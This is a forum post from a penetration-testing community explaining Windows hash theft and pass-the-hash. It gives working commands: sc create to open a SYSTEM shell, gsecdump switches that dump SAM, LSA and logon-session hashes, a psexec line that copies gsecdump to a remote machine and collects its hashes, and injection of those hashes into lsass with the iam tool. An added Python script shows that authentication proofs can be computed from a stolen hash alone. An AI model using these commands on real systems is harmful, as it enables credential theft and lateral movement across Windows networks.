中国网络渗透测试联盟
Title:
Hash injection attack
Author:
admin
Time:
2012-11-6 21:09
To get a DOS prompt as NT AUTHORITY\SYSTEM (this needs an account that is already allowed to create services, i.e. a local Administrator):

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

Error 1053 is expected here: cmd.exe never reports itself to the Service Control Manager as a running service, but the "start" it executes has already opened a second console window as SYSTEM by the time the SCM gives up, so the service can be deleted straight away. Because the service is created with type= interact, the window appears on the console desktop only on XP/2003; Vista and later keep services isolated in session 0.
------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM
C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]
options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD
Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system. In that command line, PsExec's -s runs the program as SYSTEM on the target, -c copies gsecdump.exe over and -f forces the copy even if a file of that name already exists there; the trailing -u is gsecdump's own switch for the active logon sessions, and the output is redirected to a local text file.
These are far more useful than a cachedump of the cached domain credentials (MSCACHE): the cached entries are salted with the username, so each one has to be cracked on its own, whereas the hashes from active logon sessions are the plain LM/NT hashes. The LM half breaks easily with rainbow tables, and either hash can be replayed as-is in a pass-the-hash attack without cracking it at all.
A tip: you can use iam from the pshtools toolkit to inject the hash information just grabbed with gsecdump into the local lsass process, which carries out the hash injection attack. The foreigners really are good at this; administrators will have their hands full now. The LM/NT hashes obtained during ARP spoofing, and the ones obtained with gethash, actually never need to be cracked at all; this is purely a matter of using the tool. As the original article puts it, whether the password is set to 4 characters or 127, once you have the hash you are 100% in.
Original source:
http://truesecurity.se/blogs/mur ... -text-password.aspx

I looked at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
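As an added example (not from the original post, and not code from gsecdump, PsExec or pshtoolkit), the following Python shows why the post prefers logon-session hashes to cachedump output and why the closing remark about password length holds: an NT hash is an unsalted MD4 of the password, the NTLMv2 client proof is computed from that hash alone, and MS-Cache v1 entries are salted with the username. The usernames, passwords, server challenge and client blob are constructed sample values; MD4 is implemented inline because OpenSSL 3 builds often disable hashlib's md4, and the DES step of LM is left out so that lm_halves() only shows the structural weakness rainbow tables exploit.

```python
# Added example: NT hash, MS-Cache v1 and NTLMv2 proof, to show what a stolen
# logon-session hash buys an attacker. Not code from the original post or tools.
import hashlib
import hmac
import struct

_MASK = 0xFFFFFFFF


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 (pure Python), enough for NT and MS-Cache v1 hashes."""
    msg = bytearray(data)
    bit_len = len(data) * 8
    msg.append(0x80)
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", bit_len)

    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (
        (F, 0x00000000, tuple(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        regs = state[:]
        for f, const, order, shifts in rounds:
            for i in range(16):
                j = (-i) % 4  # register updated this step cycles a, d, c, b
                a, b, c, d = (regs[(j + n) % 4] for n in range(4))
                regs[j] = _lrot((a + f(b, c, d) + X[order[i]] + const) & _MASK, shifts[i % 4])
        state = [(s + r) & _MASK for s, r in zip(state, regs)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash: unsalted MD4 of the UTF-16LE password. Same password, same hash, any user."""
    return md4(password.encode("utf-16le"))


def dcc1(username: str, password: str) -> bytes:
    """MS-Cache v1 (what cachedump recovers on XP/2003): the NT hash salted with the
    lower-cased username, so one password hashes differently for every user."""
    return md4(nt_hash(password) + username.lower().encode("utf-16le"))


def lm_halves(password: str):
    """Pre-DES LM preparation: upper-case, cut/pad to 14 bytes, split into two 7-byte
    halves. The real algorithm DES-encrypts each half separately (omitted here), which
    is why a rainbow table of 7-character upper-case strings breaks a 14-character LM hash."""
    raw = password.upper().encode("latin-1", "replace")[:14].ljust(14, b"\x00")
    return raw[:7], raw[7:]


def ntlmv2_proof(nt: bytes, user: str, domain: str, server_challenge: bytes, client_blob: bytes) -> bytes:
    """NTProofStr as in MS-NLMP: HMAC-MD5 keyed by the NT hash only. Nothing here needs
    the password, which is exactly what pass-the-hash relies on."""
    ntowf_v2 = hmac.new(nt, (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    return hmac.new(ntowf_v2, server_challenge + client_blob, hashlib.md5).digest()


if __name__ == "__main__":
    # Constructed sample: two users with the same password.
    for user in ("alice", "bob"):
        print(user, "NT:", nt_hash("password").hex(), "DCC1:", dcc1(user, "password").hex())
    # A hash as gsecdump -u would have printed it (NT hash of "password"), with no password known.
    stolen = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")
    chal = b"\x01" * 8                          # constructed server challenge
    blob = b"\x01\x01" + b"\x00" * 6 + b"\x02" * 8  # constructed client blob
    print("proof from hash == proof from password:",
          ntlmv2_proof(stolen, "alice", "CORP", chal, blob)
          == ntlmv2_proof(nt_hash("password"), "alice", "CORP", chal, blob))
```

Run stand-alone, it prints identical NT hashes and differing DCC1 values for the two users, then True for the proof comparison: the NTLMv2 response computed from the dumped hash is byte-for-byte the one the real client would send, regardless of how long the original password was.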
Welcome to 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2